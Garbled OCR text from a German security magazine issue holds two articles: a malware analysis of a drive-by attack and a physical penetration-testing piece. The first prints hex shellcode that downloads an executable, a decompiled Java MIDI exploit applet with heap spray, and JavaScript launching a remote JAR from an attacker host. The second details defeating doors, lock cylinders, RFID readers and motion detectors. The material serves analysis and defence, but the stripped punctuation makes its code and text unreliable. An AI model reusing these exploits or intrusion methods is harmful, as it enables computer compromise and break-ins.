26573730057696E4578656300BB89F289F
730C0AE75FD29F789F931C0BE3C0000000
3B51B02000066AD03851B0200008B70788
3C61C03B51B0200008DBD1F020000AD038
51B020000ABAD03851B0200005
0ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF
3A65974045E43EBE95E93D1E0038527020
00031F69666ADC1E00203851F02000089C
6AD03851B020000C3EB100000000000000
000000000000000000089851B020000565
7E858FFFFFF5F5EAB01CE803EBB7402EBE
DC355524C4D4F4E2E444C4C0055524C446
F776E6C6F6164546F46696C65410070646
67570642E65786500637261736
82E70687000
nops for the nop-slice
String str10 = 90909090
String java_version = SystemgetProperty(java
version)
url
String url = getParameter(data) applet method
int i = 0
int j = 0
while (urlcharAt(i) = )
j += urlcharAt(i)
i += 1
j += 7
j = 256
String checksum = IntegertoHexString(j)
checksum = 6e correct for the url
httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1
if (urlindexOf(deserialize= + checksum) == -1)
return
10201014
FORTGESCHRITTENE
Zusaumltzlich wird noch das oben erwaumlhnte verschleierte JavaScript auf der urspruumlnglichen HTML-Seite geladen Dieses ist noch erstaunlicher denn es enthaumllt gleich ei-ne ganze Ladung von Exploits fuumlr Java Adobe Flash sowie Adobes PDF Reader bereit Der sbquoAuthorlsquo der Sei-te war auf houmlchste Kompatibilitaumlt aus denn auch hier werden nur bestimmte ndash vor allem neuere ndash Versionen der Browser Plugins unterstuumltzt (vgl Listing 5)
Unter httpwwwexploit-dbcomexploits12117 fin-det man eine Beschreibung der Schwachstelle Diese betrifft zusaumltzlich zum analysierten Applet die Java-Ver-sion 160_19
Zusammenfassend laumlsst sich feststellen dass Schadsoftware auf verschiedensten Wegen ins Sys-tem gelangen kann Es ist nicht mehr notwendig Programme zu installieren oder aumlhnliches Die hier beschriebene HTML-Datei koumlnnte auch in einem HTML-faumlhigen E-Mail-Client ausgefuumlhrt werden Ebenso kann die iFrame-Konstruktion in E-Mails platziert werden Es sind nicht nur einzelne Pro-gramme oder PlugIns fuumlr Browser betroffen son-dern es wird versucht gezielt neue Schwachstellen fuumlr mehrere populaumlre Programme zu finden was der letzte Ausschnitt des JavaScript-Codes zeigt Auch
Listing 4b Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
Object localObject1
Object localObject2
Object localObject4
Object localObject5
String str20
String str21
String str22
if ((((java_versionindexOf(160_11) = -1) ||
(java_versionindexOf(160_12) = -1) ||
(java_versionindexOf(160_13) = -1) ||
(java_versionindexOf(160_14) = -1) ||
(java_versionindexOf(160_15) = -1) ||
(java_versionindexOf(160_16) = -1) 1 0) amp
(urlindexOf(i=1) == -1 1 0)) = 0)
Java midi vulnerable see http
vreugdenhilresearchnl201005
java-midi-parse-vulnerabilities
for detailed explaination The author claims that it
was in java 160_19
localObject1 =
localObject1 = repeat( 303)
using windows no return
localObject2 = SystemgetProperty(osname)
toLowerCase()
if (((String)localObject2)indexOf(win) gt= 0)
localObject1 = repeat( 302)
else
return
the core of the vulnerable create a malicious url
and ask javas midiplayer to play
localObject1 = + (String)localObject1 +
ZZZZZZ
try
String str19 = url + 11
localObject4 =
for (int k = 0 k lt str19length() k++)
localObject4 = (String)localObject4 + Integer
toHexString(str19charAt(k))
while (((String)localObject4)length() 8 = 0)
localObject4 = (String)localObject4 + 26 0x26 =
amp
localObject4 = str2 + (String)localObject4
thismem = spray((String)localObject4 str10)
localObject5 = new URL((String)localObject1)
MidiSystemgetSequencer()
str21 =
MidiSystemgetSoundbank((URL)localObject5) lt-- put
in url here
str22 =
MidiSystemgetSequencer()
while (true)
Threadsleep(10L)
catch (Exception localException2)
Systemoutprintln(localException2)
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 15
das Verbieten von JavaScript3 was moderne Ajax-basierte Internetseiten nahezu unbenutzbar macht haumltte auf das Laden des JavaApplets keine Auswir-kung
Wie kann man derartigen heterogenen Bedrohun-gen begegnen Das haumlufigste Einfallstor fuumlr Schad-software bleibt die E-Mail Also ist die Absicherung der E-Mail-Kommunikation der erste und wichtigs-te Schritt zur Sicherung des Systems Moderne An-ti-Spam und Anti-Virenprogramme sind in der Lage Massenmails mit gefaumlhrlichen Anhaumlngen zu erken-
nen bevor entsprechende Signaturen bereitstehen Weiterhin sollte der ausgehende E-Mail-Verkehr mit gleicher Sorgfalt auf Spam und Viren gepruumlft wer-den wie der eingehende Nur so kann man feststel-len ob man bereits ungewollt zum Spam- und Viren-versender geworden ist Am besten funktioniert dies mit einer ausgelagerten E-Mail-Sicherheitsloumlsung da der Anbieter meist von der Masse der empfangenen und analysierten E-Mails profitiert sprich Bedrohun-gen meist schneller erkennt als der einzeln agieren-de Mail-Server-Administrator Und letzen Endes gilt immer noch Oumlffnen Sie keine E-Mails oder Anhaumlnge von Unbekannten
httpde-wikipediaorgwikiJava_Virtual_Machine
fox
Listing 5 Codefragment des entschleierten JavaScript verdeutlicht das Potential
var fdata
var skd=u5350u5251u5756u9c55u00e8u0000u5d00
ued83 u6870u0070
var skd1=skd + u7468u7074 u0038u9000
var skd2=skd + u7468u7074 u0032u9000
function JAVASMB()
try
see httpwwwexploit-dbcomexploits12117 for
exploit description
var u = HTTP -J-jar -Jbittoramcomsmbold
avi httparestyutecom
sadhbdsa879321jbdaslphpi=2
none
if (windownavigatorappName == Microsoft Internet
Explorer)
try
var o = documentcreateElement(OBJECT)
oclassid = clsidCAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
olaunch(u)
catch (e)
var o2 = documentcreateElement(OBJECT)
o2classid = clsid8AD9C840-044E-11D1-B3E9-
00805F499D93
o2launch(u)
else
var o = documentcreateElement(OBJECT)
var n = documentcreateElement(OBJECT)
otype = applicationnpruntime-scriptable-
plugindeploymenttoolkit
ntype = applicationjava-deployment-toolkit
documentbodyappendChild(o)
documentbodyappendChild(n)
try
olaunch(u)
catch (e)
nlaunch(u)
catch (e)
IEPEERS()
IEPEERS()
JAVASMB()
MICHAEL PEICKEntwickler und Mitglied des eleven Research Teams
Penetration Testing im Jahre 2010
hakin9orgde 17
Im Jahr 2010 ist es kein Problem mehr ein Netzwerk vor Gefahren zu schuumltzen Firewall-Hardware gibt es mittlerweile zu erschwinglichen Preisen IT-System-
haumluser holen sich Sicherheitsexperten und richten mit deren Unterstuumltzung ein sicheres Netzwerk ein Mitar-beiter werden im Umgang mit der IT-Technik geschult sodass Phishing und Social Engineering Angriffe erfolg-los verlaufen IDS und IPS Systeme finden verdaumlchtige Aktivitaumlten im Netzwerk und zeigen diese dem Adminis-trator an Die IEEE 8021X Authentifizierung an Access Points und Netzwerkswitches verhindern den Zugang von unbekannten Computern zum Netzwerk Mit IEEE 8021Q (Virtual Local Area Network oder kurz VLAN) werden Netzwerke segmentiert obwohl alle Compu-ter hardwareseitig an einem Switch haumlngen Mit diesen Techniken ist man in der Lage ein Netzwerk sowohl vor Angriffen aus dem WAN als auch aus dem Inneren LAN zu schuumltzen ndash wuumlrde man meinen
Die RealitaumltIch wurde von einem mittelstaumlndischen Unternehmen engagiert einen Penetrationstest durchzufuumlhren Waumlh-rend der Footprinting-Phase habe ich sehr schnell er-kannt dass die IT-Sicherheit bei diesem Unternehmen ein sehr sensibles Thema ist Doch trotz fast paranoider Sicherheitsvorkehrungen ist es mir erfolgreich gelun-gen dem Unternehmen die Kundendaten zu entwen-den Zwar war IT-Technisch alles abgesichert der phy-sische Zugang zu den Daten war es allerdings nicht Die Eingangstuumlr des Unternehmens war wegen des
Kundenverkehrs nicht abgeschlossen Die Tuumlr zum Serverraum stand wohl wegen der Abwaumlrme sperran-gelweit offen im Schloss des Racks steckte der Schluumls-sel Es gab nichts und niemanden der mich davor ab-halten konnte aus jedem Server jeweils eine Festplatte einzustecken und blitzschnell das Gelaumlnde zu verlas-sen Weder der Geschaumlftsfuumlhrer noch die IT-Adminis-tration hat mit einem so dreisten und einfachen Angriff gerechnet
In dem folgenden Artikel werde ich die aktuelle Si-cherheitstechnik vorstellen und aufzeigen wie ein-fach diese Technik zerstoumlrungsfrei mit und fast spurlos uumlberlistet werden kann Dieser Artikel ist keine Anlei-tung wie man einbricht er soll lediglich die Schwach-stellen der heute massenhaft eingesetzten Systeme aufzeigen Aus diesem Grund habe ich mich bei den Beschreibungen kurz gefasst sowie einige Details weggelassen
Zugefallene TuumlrenWas ist eigentlich eine zugefallene Tuumlr Rund 95 al-ler Tuumlren haben heute ein Schloss mit einer Falle Wird die Tuumlr zugezogen faumlllt die Schlossfalle in die dafuumlr vorgesehene Oumlffnung des Schlieszligbleches in der Tuumlrz-arge Die Tuumlr laumlsst sich dann entweder mit dem Tuumlr-griff oder durch das drehen des Schlieszligzylinders wieder oumlffnen (wenn zB auf einer Seite ein Knauf statt eines Angriffes angebracht ist) Mit dem Schluumlssel reicht ei-ne halbe Umdrehung aus um die Tuumlr wieder zu oumlffnen Bei elektronischen Schlieszligsystemen erfolgt die Freiga-
Penetration Testing im Jahre 2010
Viele Administratoren uumlbersehen leider bei der Absicherung des Netzwerkes seine physikalische Sicherheit Die Bedrohung kommt nicht nur durch das Ethernet-Kabel
IN DIESEM ARTIKEL ERFAHREN SIE
werden koumlnnen
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Dimitri Roschkowski
10201018
PRAXIS
Um so etwas zu verhindern bieten sich sogenannte Doppelfalztuumlren an (Abbildung 2) Diese Tuumlren haben einen zweiten Knick im Rahmen und Tuumlrblatt Eine an-gesetzte Oumlffnungsnadel kommt damit nicht mehr an die Schlieszligfalle ran und eine Oumlffnung wird damit verhindert Mit einer sogenannten bdquoMach Aufldquo Faltkarte laumlsst sich aber auch dieses Hindernis uumlberwinden
Damit eine Tuumlr mit diesen Techniken nicht geoumlffnet werden kann hilft es nur diese Tuumlr abzuschlieszligen Dabei wird mindestens ein Riegel in das Schlieszligblech geschoben der ohne Schluumlssel nicht mehr zuruumlckge-schoben werden kann Das Abschlieszligen einer Tuumlr mit Schluumlssel ist jedoch nicht komfortabel Diese Schwauml-che haben die Schlosshersteller erkannt und bie-ten selbstschlieszligende Schloumlsser an Diese Schloumls-ser schieben automatisch beim zufallen die Riegel in das Schlieszligblech Betaumltigt man die Tuumlrklinke wird gleichzeitig die Schlossfalle und die Riegel zuruumlckge-schoben die Tuumlr ist wieder offen Je nach Modell des Schlosses braucht man aber weiterhin eine bis zwei Umdrehungen mit dem Schluumlssel um diese Tuumlr zu oumlff-nen
Diese Schloumlsser sind allerdings nicht fuumlr Tuumlren ge-eignet die uumlber eine Elektronik geoumlffnet werden sol-len Hierfuumlr gibt es allerdings auch eine Loumlsung Es gibt Schloumlsser mit einer Elektronik und einem Elekt-romotor der dann bei einem entsprechenden Signal das Schloss aufschlieszligt und damit die Funktion eines Schluumlssels simuliert Allerdings sind solche Schloumlsser recht teuer
Lockpicking ndash Der Zylinder als AngriffszielEine weitere Schwachstelle einer Tuumlr ist der Zylinder Ein Laie kann nicht erkennen ob die Mechanik eines Zylinders sicher ist oder mit entsprechendem Werkzeug sekundenschnell uumlberlistet werden kann Fuumlr ihn zaumlhlt lediglich der Preis und die Logos auf der Verpackung um die Sicherheit beurteilen zu koumlnnen Hier gilt aller-dings ausnahmsweise der Grundsatz billig = schlechtteuer = gut wobei man dazu anmerken muss dass man die oberste Preiskategorie der Zylinder waumlhlen muss um tatsaumlchlich eine hohe Sicherheitsstufe her-stellen zu koumlnnen Dass man Zylinder oumlffnen kann liegt an der (Massen-)Herstellung dieser mechanischen Ge-raumlte Jedes Produkt weist gewisse Toleranzen auf je groumlszliger diese Toleranzen sind desto leichter laumlsst sich der Zylinder uumlberlisten
Wie Funktioniert ein SchlieszligzylinderEin Schlieszligzylinder besteht aus einem Gehaumluse (hell-grau) und einem Kern (dunkelgrau) Kernstifte (gelb) und Gehaumlusestifte (rot) verhindern dass der Kern ge-dreht werden kann Fuumlhrt man nun einen Schluumlssel in den Schlieszligkanal (weiszlig) ein druumlcken die Zaumlhne des Schluumlssels die Kernstifte herunter sodass der Uumlber-gang zwischen den Kernstiften und den Gehaumlusestif-
be dabei nicht an der Schlossfalle freigegeben sondern am Schlieszligblech
Wie laumlsst sich eine zugefallene Tuumlr oumlffnen Zugefallene Tuumlren lassen sich ganz einfach oumlffnen Schluumls-seldienste verwenden hierfuumlr Oumlffnungsnadeln (Abbildung 1) Diese Oumlffnungsnadeln werden in Houmlhe der Schlossfalle zwischen Tuumlrzarge und Tuumlrblatt angesetzt zieht man jetzt den hinteren Teil der Oumlffnungsnadel nach oben druumlckt der vordere Teil die Schlieszligfalle wieder ins Schloss zuruumlck ndash die Tuumlr ist damit offen Mit etwas Uumlbung dauert es nicht laumlnger als fuumlnf Sekunden um eine Tuumlr zu oumlffnen
Abbildung 2 Eine Oumlffnungsnadel an einer Doppelfalztuumlr
Abbildung 1 Zwei Saumltze Oumlffnungsnadeln
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
